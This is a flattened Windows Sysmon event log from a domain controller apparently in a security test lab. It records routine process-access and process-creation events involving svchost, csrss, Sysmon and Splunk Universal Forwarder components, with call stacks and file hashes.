10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.708{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.709{59A5CD1D-8FE0-6005-0601-00000000A301}4812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.177{59A5CD1D-8FE0-6005-0501-00000000A301}36762572C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:48.036{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.036{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:48.037{59A5CD1D-8FE0-6005-0501-00000000A301}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:40:49.943{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FE1-6005-0701-00000000A301}2912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:40:49.943{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 